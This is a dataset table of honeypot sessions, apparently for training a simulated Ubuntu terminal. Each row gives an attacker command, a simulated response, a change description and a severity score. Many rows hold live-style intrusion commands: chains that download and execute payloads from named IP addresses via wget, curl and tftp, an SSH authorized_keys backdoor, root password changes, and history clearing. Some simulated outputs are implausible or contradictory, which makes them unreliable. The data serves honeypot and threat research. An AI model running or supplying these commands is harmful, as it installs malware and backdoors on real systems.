session_id stringclasses 160
values | period stringclasses 1
value | turn_index int64 0 351 | command stringlengths 1 1.77k | response stringlengths 12 6.81k | system_change stringlengths 4 2.61k | severity_vi int64 0 4 | response_source stringclasses 1
value |
|---|---|---|---|---|---|---|---|
48766cfc71ee | 2021_2022 | 6 | which ls | root@ubuntu:~# which ls
/bin/ls
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
48766cfc71ee | 2021_2022 | 7 | crontab -l | root@ubuntu:~# crontab -l
No crontab for root
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
48766cfc71ee | 2021_2022 | 8 | w | root@ubuntu:~# w
15:44:54 up 2:00, 1 user, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 192.168.1.100 13:44 2.00s 0.04s 0.00s w
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
48766cfc71ee | 2021_2022 | 9 | uname -m | root@ubuntu:~# uname -m
x86_64
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
48766cfc71ee | 2021_2022 | 10 | cat /proc/cpuinfo | grep model | grep name | wc -l | root@ubuntu:~# cat /proc/cpuinfo | grep model | grep name | wc -l
24
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
84a26edbe2c1 | 2021_2022 | 0 | cat /proc/cpuinfo | grep name | wc -l | root@ubuntu:~# cat /proc/cpuinfo | grep name | wc -l
24
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
84a26edbe2c1 | 2021_2022 | 1 | echo -e "ax\n65PiEd4fDzmx\n65PiEd4fDzmx"|passwd|bash | root@ubuntu:~# echo -e "ax\n65PiEd4fDzmx\n65PiEd4fDzmx"|passwd|bash
New password: Retype new password: passwd: password updated successfully
root@ubuntu:~# | The password for the user 'ax' has been changed to '65PiEd4fDzmx'. | 4 | curated_ubuntu |
84a26edbe2c1 | 2021_2022 | 2 | echo "ax\n65PiEd4fDzmx\n65PiEd4fDzmx\n"|passwd | root@ubuntu:~# echo "ax\n65PiEd4fDzmx\n65PiEd4fDzmx\n"|passwd
New password: Retype new password: passwd: password updated successfully
root@ubuntu:~# | The password for the user 'ax' has been changed to '65PiEd4fDzmx'. | 4 | curated_ubuntu |
84a26edbe2c1 | 2021_2022 | 3 | cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' | root@ubuntu:~# cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
Intel(R) Xeon(R) Silver 4214 CPU @ 2.20GHz
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
84a26edbe2c1 | 2021_2022 | 4 | free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' | root@ubuntu:~# free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
725938364 123456 234567 345678 456789 567890
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
84a26edbe2c1 | 2021_2022 | 5 | ls -lh $(which ls) | root@ubuntu:~# ls -lh $(which ls)
-rwxr-xr-x 1 root root 129K Jan 18 2023 /bin/ls
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
84a26edbe2c1 | 2021_2022 | 6 | which ls | root@ubuntu:~# which ls
/bin/ls
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
84a26edbe2c1 | 2021_2022 | 7 | crontab -l | root@ubuntu:~# crontab -l
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hou... | No changes to the system. | 0 | curated_ubuntu |
84a26edbe2c1 | 2021_2022 | 8 | w | root@ubuntu:~# w
15:49:26 up 2:00, 1 user, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 192.168.1.100 13:49 2:00m 0.03s 0.03s -bash
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
84a26edbe2c1 | 2021_2022 | 9 | uname -m | root@ubuntu:~# uname -m
x86_64
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
e36579f1c98a | 2021_2022 | 0 | cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://198.23.172.240/100UP.sh; curl -O http://198.23.172.240/100UP.sh; chmod 777 100UP.sh; sh 100UP.sh; rm -rf * | root@ubuntu:~# cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
root@tmp:~# wget http://198.23.172.240/100UP.sh
--2023-10-31 15:50:37-- http://198.23.172.240/100UP.sh
Connecting to 198.23.172.240:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28 [application/x-sh]
Saving to: ‘100UP.sh’
1... |
- The terminal changed the working directory to '/tmp'.
- A shell script was downloaded from the server with IP '198.23.172.240' using wget and curl.
- The downloaded script was given full permissions and executed.
- All files in the '/tmp' directory were removed. | 3 | curated_ubuntu |
b116ec57cb31 | 2021_2022 | 0 | cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; rm -rf installer.sh; wget http://51.75.170.84/installer.sh; chmod 777 installer.sh; sh installer.sh; rm -rf tftp1.sh; tftp 51.75.170.84 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; rm -rf tftp2.sh; tftp -r tftp2.sh -g 51.75.170.84; chmod 777 tftp2.sh; sh tftp2... | root@ubuntu:~# cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
root@tmp:~# rm -rf installer.sh
root@tmp:~# wget http://51.75.170.84/installer.sh
--2023-10-31 15:51:21-- http://51.75.170.84/installer.sh
Connecting to 51.75.170.84:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28 [applicat... |
- The terminal changed the working directory to '/tmp'.
- Three shell scripts were downloaded from the server with IP '51.75.170.84' using different methods (wget, tftp).
- The downloaded scripts were given full permissions and executed.
- All scripts and all files in the '/tmp' directory were removed. | 4 | curated_ubuntu |
4d6dbd508ac3 | 2021_2022 | 0 | cd /tmp || cd /var/run || cd /sys || cd /bin || cd /mnt || cd /root || cd /; wget http://109.104.151.10/mtr.sh; busybox wget http://109.104.151.10/mtr.sh; curl -O http://109.104.151.10/mtr.sh; chmod +x mtr.sh; sh mtr.sh; rm -rf mtr.sh; tftp 109.104.151.10 -c get mtr1.sh; chmod 777 mtr1.sh; sh mtr1.sh; tftp -r mtr2.sh -... | root@ubuntu:~# cd /tmp || cd /var/run || cd /sys || cd /bin || cd /mnt || cd /root || cd /
root@/:~# wget http://109.104.151.10/mtr.sh
--2023-10-31 15:51:40-- http://109.104.151.10/mtr.sh
Connecting to 109.104.151.10:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28 [application/x-sh]
Saving t... |
- The terminal changed the working directory to '/'.
- Three shell scripts were downloaded from the server with IP '109.104.151.10' using different methods (wget, busybox wget, curl).
- The downloaded scripts were given full permissions and executed.
- All scripts and all files with the '.sh' extension in the '/' dire... | 4 | curated_ubuntu |
4bf13d8785cc | 2021_2022 | 0 | cat /etc/issue; | root@ubuntu:~# cat /etc/issue
Ubuntu 18.04.1 LTS \n \l
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
9cca8858c1df | 2021_2022 | 0 | enable | root@ubuntu:~# enable
root@ubuntu:~# | The 'enable' command was executed, but it doesn't change anything in the system as it is used to enable and disable builtin shell commands. | 0 | curated_ubuntu |
9cca8858c1df | 2021_2022 | 1 | system | root@ubuntu:~# system
bash: system: command not found
root@ubuntu:~# | The 'system' command was attempted, but it is not a recognized command in this Linux environment. | 0 | curated_ubuntu |
9cca8858c1df | 2021_2022 | 2 | shell | root@ubuntu:~# shell
bash: shell: command not found
root@ubuntu:~# | The 'shell' command was attempted, but it is not a recognized command in this Linux environment. | 0 | curated_ubuntu |
9cca8858c1df | 2021_2022 | 3 | sh | root@ubuntu:~# sh
# | The shell has been changed to 'sh' from 'bash'. | 2 | curated_ubuntu |
9cca8858c1df | 2021_2022 | 4 | echo -e '\x41\x4b\x34\x37' | # echo -e '\x41\x4b\x34\x37'
AK47
# | No changes to the system were made. The command simply echoed the ASCII representation of the hexadecimal values. | 0 | curated_ubuntu |
9cca8858c1df | 2021_2022 | 5 | cd /tmp || cd /var/run || cd /mnt || cd /root || cd / | # cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
/tmp # | The working directory was changed to '/tmp'. | 2 | curated_ubuntu |
9cca8858c1df | 2021_2022 | 6 | cd /tmp || cd $(find / -writable | head -n 1); | /tmp # cd /tmp || cd $(find / -writable | head -n 1);
/tmp # | The command attempted to change the working directory to '/tmp' or the first writable directory it could find. However, since the current directory was already '/tmp', no change was made. | 2 | curated_ubuntu |
9cca8858c1df | 2021_2022 | 7 | find / -writable | head -n 1 | /tmp # find / -writable | head -n 1
/tmp
/tmp # | No changes to the system were made. The command simply found the first writable directory in the system, which is '/tmp'. | 0 | curated_ubuntu |
cfc2765c28fe | 2021_2022 | 0 | enable | root@ubuntu:~# enable
root@ubuntu:~# | The 'enable' command was executed, but it doesn't change anything in the system as it is used to enable and disable builtin shell commands. | 0 | curated_ubuntu |
cfc2765c28fe | 2021_2022 | 1 | system | root@ubuntu:~# system
bash: system: command not found
root@ubuntu:~# | The 'system' command was attempted, but it is not a recognized command in this Linux environment. | 0 | curated_ubuntu |
cfc2765c28fe | 2021_2022 | 2 | shell | root@ubuntu:~# shell
bash: shell: command not found
root@ubuntu:~# | The 'shell' command was attempted, but it is not a recognized command in this Linux environment. | 0 | curated_ubuntu |
cfc2765c28fe | 2021_2022 | 3 | sh | root@ubuntu:~# sh
# | The shell has been changed to 'sh' from 'bash'. | 2 | curated_ubuntu |
cfc2765c28fe | 2021_2022 | 4 | cat /proc/mounts; /bin/busybox SCCGX | # cat /proc/mounts
sysfs /sys sysfs rw,nosuid,nodev,noexec,relatime 0 0
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
udev /dev devtmpfs rw,nosuid,relatime,size=10240k,nr_inodes=2175984,mode=755 0 0
devpts /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000 0 0
tmpfs /run tmpfs rw,nosuid,noexec,... | None | 0 | curated_ubuntu |
cfc2765c28fe | 2021_2022 | 5 | cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox SCCGX | # cd /dev/shm
# cat .s || cp /bin/echo .s
# /bin/busybox SCCGX
# |
- The working directory was changed to '/dev/shm'.
- If a file named '.s' exists in '/dev/shm', its content was displayed. If not, the 'echo' command was copied to a new file named '.s' in '/dev/shm'. | 2 | curated_ubuntu |
cfc2765c28fe | 2021_2022 | 6 | tftp; wget; /bin/busybox SCCGX | # tftp
BusyBox v1.30.1 (Ubuntu 1:1.30.1-4ubuntu6.3) multi-call binary.
Usage: tftp [OPTIONS] HOST [PORT]
Transfer a file from/to tftp server
-l FILE Local FILE
-r FILE Remote FILE
-g Get file
-p Put file
# wget
wget: missing URL
Usage: wget [OPTION]... [URL]...
Try `wget --help' for more options.
# /bin/busyb... | None | 0 | curated_ubuntu |
cfc2765c28fe | 2021_2022 | 7 | dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s | # dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s
1+0 records in
1+0 records out
52 bytes copied, 0.000123 s, 423 kB/s
# | The 'dd' command was used to read 52 bytes from the file '.s' in the '/dev/shm' directory. If the 'dd' command failed, the 'cat' command was used to display the content of the file '.s'. If the 'cat' command also failed, a 'while' loop was used to read the file '.s' line by line and display each line. | 0 | curated_ubuntu |
cfc2765c28fe | 2021_2022 | 8 | /bin/busybox SCCGX | # /bin/busybox SCCGX
# | None | 0 | curated_ubuntu |
b0381833b4d2 | 2021_2022 | 0 | cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5... | root@ubuntu:~# cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0... |
- The '.ssh' directory in the home directory was deleted and recreated.
- A new SSH public key was added to the 'authorized_keys' file in the '.ssh' directory.
- All group and other permissions were removed from the '.ssh' directory and its contents. | 4 | curated_ubuntu |
b0381833b4d2 | 2021_2022 | 1 | cat /proc/cpuinfo | grep name | wc -l | root@ubuntu:~# cat /proc/cpuinfo | grep name | wc -l
24
root@ubuntu:~# | No changes to the system were made. | 0 | curated_ubuntu |
b0381833b4d2 | 2021_2022 | 2 | echo -e "froneridevsinc\nu0zgVZgftute\nu0zgVZgftute"|passwd|bash | root@ubuntu:~# echo -e "froneridevsinc\nu0zgVZgftute\nu0zgVZgftute"|passwd|bash
New password: Retype new password: passwd: password updated successfully
root@ubuntu:~# | The password for the user 'froneridevsinc' has been changed to 'u0zgVZgftute'. | 4 | curated_ubuntu |
b0381833b4d2 | 2021_2022 | 3 | echo "froneridevsinc\nu0zgVZgftute\nu0zgVZgftute\n"|passwd | root@ubuntu:~# echo "froneridevsinc\nu0zgVZgftute\nu0zgVZgftute\n"|passwd
Enter new UNIX password: Retype new UNIX password: passwd: password updated successfully
root@ubuntu:~# | The password for the root user has been changed to 'froneridevsinc'. | 4 | curated_ubuntu |
b0381833b4d2 | 2021_2022 | 4 | cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' | root@ubuntu:~# cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
Intel(R) Xeon(R) Silver
root@ubuntu:~# | No changes to the system were made. | 0 | curated_ubuntu |
b0381833b4d2 | 2021_2022 | 5 | free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' | root@ubuntu:~# free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
725938 123456 567890 12345 67890 123456
root@ubuntu:~# | No changes to the system were made. | 0 | curated_ubuntu |
b0381833b4d2 | 2021_2022 | 6 | ls -lh $(which ls) | root@ubuntu:~# ls -lh $(which ls)
-rwxr-xr-x 1 root root 129K Jan 18 2023 /bin/ls
root@ubuntu:~# | No changes to the system were made. | 0 | curated_ubuntu |
b0381833b4d2 | 2021_2022 | 7 | which ls | root@ubuntu:~# which ls
/bin/ls
root@ubuntu:~# | No changes to the system were made. | 0 | curated_ubuntu |
b0381833b4d2 | 2021_2022 | 8 | crontab -l | root@ubuntu:~# crontab -l
No crontab for root
root@ubuntu:~# | No changes to the system were made. | 0 | curated_ubuntu |
b0381833b4d2 | 2021_2022 | 9 | w | root@ubuntu:~# w
16:02:43 up 2:00, 1 user, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 192.168.1.100 14:02 0.00s 0.04s 0.00s w
root@ubuntu:~# | No changes to the system were made. | 0 | curated_ubuntu |
b0381833b4d2 | 2021_2022 | 10 | uname -m | root@ubuntu:~# uname -m
x86_64
root@ubuntu:~# | No changes to the system were made. | 0 | curated_ubuntu |
b0381833b4d2 | 2021_2022 | 11 | cat /proc/cpuinfo | grep model | grep name | wc -l | root@ubuntu:~# cat /proc/cpuinfo | grep model | grep name | wc -l
24
root@ubuntu:~# | No changes to the system were made. | 0 | curated_ubuntu |
b0381833b4d2 | 2021_2022 | 12 | top | root@ubuntu:~# top
top - 16:04:01 up 2:00, 1 user, load average: 0.00, 0.01, 0.05
Tasks: 88 total, 1 running, 87 sleeping, 0 stopped, 0 zombie
%Cpu(s): 0.3 us, 0.1 sy, 0.0 ni, 99.6 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
MiB Mem : 725938.4 total, 567890.1 free, 123456.0 used, 34592.3 buff/cache
MiB Swap:... | None | 0 | curated_ubuntu |
b0381833b4d2 | 2021_2022 | 13 | uname | root@ubuntu:~# uname
Linux
root@ubuntu:~# | No changes to the system were made. | 0 | curated_ubuntu |
b0381833b4d2 | 2021_2022 | 14 | uname -a | root@ubuntu:~# uname -a
Linux ubuntu 5.4.0-159-generic #176-Ubuntu SMP Wed Oct 13 16:45:01 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
root@ubuntu:~# | No changes to the system were made. | 0 | curated_ubuntu |
b0381833b4d2 | 2021_2022 | 15 | lscpu | grep Model | root@ubuntu:~# lscpu | grep Model
Model name: Intel(R) Xeon(R) Silver 4214 CPU @ 2.20GHz
root@ubuntu:~# | No changes to the system were made. | 0 | curated_ubuntu |
b0381833b4d2 | 2021_2022 | 16 | cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' | root@ubuntu:~# cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
Intel(R) Xeon(R) Silver 4214 CPU @ 2.20GHz
root@ubuntu:~# | No changes to the system were made. | 0 | curated_ubuntu |
b0381833b4d2 | 2021_2022 | 17 | free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' | root@ubuntu:~# free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
725938364 123456 234567 345678 456789 567890
root@ubuntu:~# | No changes to the system were made. | 0 | curated_ubuntu |
b0381833b4d2 | 2021_2022 | 18 | ls -lh $(which ls) | root@ubuntu:~# ls -lh $(which ls)
-rwxr-xr-x 1 root root 129K Jul 2 2023 /bin/ls
root@ubuntu:~# | No changes to the system were made. | 0 | curated_ubuntu |
b0381833b4d2 | 2021_2022 | 19 | which ls | root@ubuntu:~# which ls
/bin/ls
root@ubuntu:~# | No changes to the system were made. | 0 | curated_ubuntu |
b0381833b4d2 | 2021_2022 | 20 | crontab -l | root@ubuntu:~# crontab -l
No crontab for root
root@ubuntu:~# | No changes to the system were made. | 0 | curated_ubuntu |
b0381833b4d2 | 2021_2022 | 21 | w | root@ubuntu:~# w
16:10:24 up 2:00, 1 user, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 192.168.1.100 14:10 2.00s 0.03s 0.00s w
root@ubuntu:~# | No changes to the system were made. | 0 | curated_ubuntu |
b0381833b4d2 | 2021_2022 | 22 | uname -m | root@ubuntu:~# uname -m
x86_64
root@ubuntu:~# | No changes to the system were made. | 0 | curated_ubuntu |
b0381833b4d2 | 2021_2022 | 23 | cat /proc/cpuinfo | grep model | grep name | wc -l | root@ubuntu:~# cat /proc/cpuinfo | grep model | grep name | wc -l
32
root@ubuntu:~# | No changes to the system were made. | 0 | curated_ubuntu |
b0381833b4d2 | 2021_2022 | 24 | top | root@ubuntu:~# top
top - 16:13:42 up 2:00, 1 user, load average: 0.00, 0.01, 0.05
Tasks: 88 total, 1 running, 87 sleeping, 0 stopped, 0 zombie
%Cpu(s): 0.3 us, 0.1 sy, 0.0 ni, 99.6 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
MiB Mem : 725938364 total, 725938364 free, 0 used, 0 buff/cache
MiB Swa... | None | 0 | curated_ubuntu |
b0381833b4d2 | 2021_2022 | 25 | uname | root@ubuntu:~# uname
Linux
root@ubuntu:~# | No changes to the system were made. | 0 | curated_ubuntu |
b0381833b4d2 | 2021_2022 | 26 | uname -a | root@ubuntu:~# uname -a
Linux ubuntu 5.4.0-159-generic #176-Ubuntu SMP Wed Oct 13 16:45:01 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
root@ubuntu:~# | No changes to the system were made. | 0 | curated_ubuntu |
b0381833b4d2 | 2021_2022 | 27 | lscpu | grep Model | root@ubuntu:~# lscpu | grep Model
Model name: Intel(R) Xeon(R) Silver 4214 CPU @ 2.20GHz
root@ubuntu:~# | No changes to the system were made. | 0 | curated_ubuntu |
173afec6a97c | 2021_2022 | 0 | cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5... | root@ubuntu:~# cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0... |
- The '.ssh' directory in the home directory was removed and recreated.
- A new SSH public key was added to the 'authorized_keys' file in the '.ssh' directory.
- All permissions for group and others were removed from the '.ssh' directory and its contents. | 4 | curated_ubuntu |
173afec6a97c | 2021_2022 | 1 | cat /proc/cpuinfo | grep name | wc -l | head -c 30 | root@ubuntu:~# cat /proc/cpuinfo | grep name | wc -l | head -c 30
24
root@ubuntu:~# | No changes to the system were made by this command. | 0 | curated_ubuntu |
52d45ad53d53 | 2021_2022 | 0 | cd /tmp; wget 51.79.55.208:8281/sshd -O /tmp/sshd; curl 51.79.55.208:8281/sshd -o /tmp/sshd; bash /tmp/sshd; rm -rf /tmp/sshd; rm -r /tmp/sshd; rm -rf /var/tmp/sshd; rm -rf /var/tmp/sshd.*; rm -rf /tmp/sshd.* | root@ubuntu:~# cd /tmp
root@ubuntu:/tmp# wget 51.79.55.208:8281/sshd -O /tmp/sshd
--2023-10-31 16:18:25-- http://51.79.55.208:8281/sshd
Connecting to 51.79.55.208:8281... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28 [application/x-sh]
Saving to: ‘/tmp/sshd’
100%[===============================... |
- The terminal changed the working directory to '/tmp'.
- A file named 'sshd' was downloaded from the server with IP '51.79.55.208' using wget and curl.
- The downloaded file was executed using bash.
- The file 'sshd' was removed from '/tmp' and '/var/tmp' directories, along with any files with names starting with 'ss... | 3 | curated_ubuntu |
2093e9a69d88 | 2021_2022 | 0 | cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://65.21.184.203/zeros6x.sh; curl -O http://65.21.184.203/zeros6x.sh; chmod 777 zeros6x.sh; sh zeros6x.sh; tftp 65.21.184.203 -c get zeros6x.sh; chmod 777 zeros6x.sh; sh zeros6x.sh; tftp -r zeros6x2.sh -g 65.21.184.203; chmod 777 zeros6x2.sh; sh zeros6x2.sh; ftpge... | root@ubuntu:~# cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
root@/:~# wget http://65.21.184.203/zeros6x.sh
--2023-10-31 16:18:54-- http://65.21.184.203/zeros6x.sh
Connecting to 65.21.184.203:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28 [application/x-sh]
Saving to: ‘zeros6x.sh’
... |
- The terminal changed the working directory to '/'.
- Four shell scripts were downloaded from the server with IP '65.21.184.203' using different methods (wget, curl, tftp, ftpget).
- The downloaded scripts were given full permissions and executed.
- All scripts and all files in the '/' directory were removed. | 4 | curated_ubuntu |
bb90ada67abb | 2021_2022 | 0 | cat /etc/issue; wget http://45.10.24.18/x86_64; chmod 777 x86_64; ./x86_64 skids | root@ubuntu:~# cat /etc/issue
Ubuntu 18.04.1 LTS \n \l
root@ubuntu:~# wget http://45.10.24.18/x86_64
--2023-10-31 16:19:33-- http://45.10.24.18/x86_64
Connecting to 45.10.24.18:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28 [application/octet-stream]
Saving to: ‘x86_64’
100%[=============... |
- A file named 'x86_64' was downloaded from the server with IP '45.10.24.18'.
- The downloaded file was given full permissions and executed with the argument 'skids'. | 3 | curated_ubuntu |
df31f5a87e6f | 2021_2022 | 0 | wget http://193.233.185.75/fbot.x86_64; chmod 777 fbot.x86_64; ./fbot.x86_64 x86_64 | root@ubuntu:~# wget http://193.233.185.75/fbot.x86_64
--2023-10-31 16:19:45-- http://193.233.185.75/fbot.x86_64
Connecting to 193.233.185.75:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28 [application/x-sh]
Saving to: ‘fbot.x86_64’
100%[======================================>] 28 ... |
- The file 'fbot.x86_64' was downloaded from the server with IP '193.233.185.75'.
- The downloaded file was given full permissions.
- The file 'fbot.x86_64' was executed with 'x86_64' as an argument. | 3 | curated_ubuntu |
cfcc10fd8b3d | 2021_2022 | 0 | cat /proc/cpuinfo | grep name | wc -l | root@ubuntu:~# cat /proc/cpuinfo | grep name | wc -l
24
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
cfcc10fd8b3d | 2021_2022 | 1 | echo "root:Wwgxo4KuxYrN"|chpasswd|bash | root@ubuntu:~# echo "root:Wwgxo4KuxYrN"|chpasswd|bash
root@ubuntu:~# | The password for the root user has been changed to 'Wwgxo4KuxYrN'. | 4 | curated_ubuntu |
cfcc10fd8b3d | 2021_2022 | 2 | cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' | root@ubuntu:~# cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
Intel(R) Xeon(R) Silver 4214 CPU
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
cfcc10fd8b3d | 2021_2022 | 3 | free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' | root@ubuntu:~# free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
725938364 123456 234567 345678 456789 567890
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
cfcc10fd8b3d | 2021_2022 | 4 | ls -lh $(which ls) | root@ubuntu:~# ls -lh $(which ls)
-rwxr-xr-x 1 root root 129K Jan 18 2023 /bin/ls
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
cfcc10fd8b3d | 2021_2022 | 5 | which ls | root@ubuntu:~# which ls
/bin/ls
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
cfcc10fd8b3d | 2021_2022 | 6 | crontab -l | root@ubuntu:~# crontab -l
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hou... | No changes to the system. | 0 | curated_ubuntu |
cfcc10fd8b3d | 2021_2022 | 7 | w | root@ubuntu:~# w
16:22:57 up 2:00, 1 user, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 192.168.1.100 14:22 0.00s 0.04s 0.00s w
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
cfcc10fd8b3d | 2021_2022 | 8 | uname -m | root@ubuntu:~# uname -m
x86_64
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
cfcc10fd8b3d | 2021_2022 | 9 | cat /proc/cpuinfo | grep model | grep name | wc -l | root@ubuntu:~# cat /proc/cpuinfo | grep model | grep name | wc -l
24
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
cfcc10fd8b3d | 2021_2022 | 10 | top | root@ubuntu:~# top
top - 16:23:10 up 2:00, 1 user, load average: 0.00, 0.01, 0.05
Tasks: 133 total, 1 running, 132 sleeping, 0 stopped, 0 zombie
%Cpu(s): 0.3 us, 0.1 sy, 0.0 ni, 99.6 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
MiB Mem : 708590.8 total, 705413.3 free, 1837.5 used, 1340.0 buff/cache
MiB Swap:... | None | 0 | curated_ubuntu |
cfcc10fd8b3d | 2021_2022 | 11 | uname | root@ubuntu:~# uname
Linux
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
124194b4a9c7 | 2021_2022 | 0 | cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://179.43.176.41/cometome; cat cometome > meth; chmod +x meth; chmod 777 meth; ./meth; history -c | root@ubuntu:~# cat /etc/issue
Ubuntu 18.04.1 LTS \n \l
root@ubuntu:~# cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
root@/:~# wget -q http://179.43.176.41/cometome
root@/:~# cat cometome > meth
root@/:~# chmod +x meth
root@/:~# chmod 777 meth
root@/:~# ./meth
root@/:~# history -c
root@/:~# |
- The terminal changed the working directory to '/'.
- A file named 'cometome' was downloaded from the server with IP '179.43.176.41'.
- The content of 'cometome' was copied to a new file named 'meth'.
- The 'meth' file was given execute permissions and then executed.
- The command history was cleared. | 3 | curated_ubuntu |
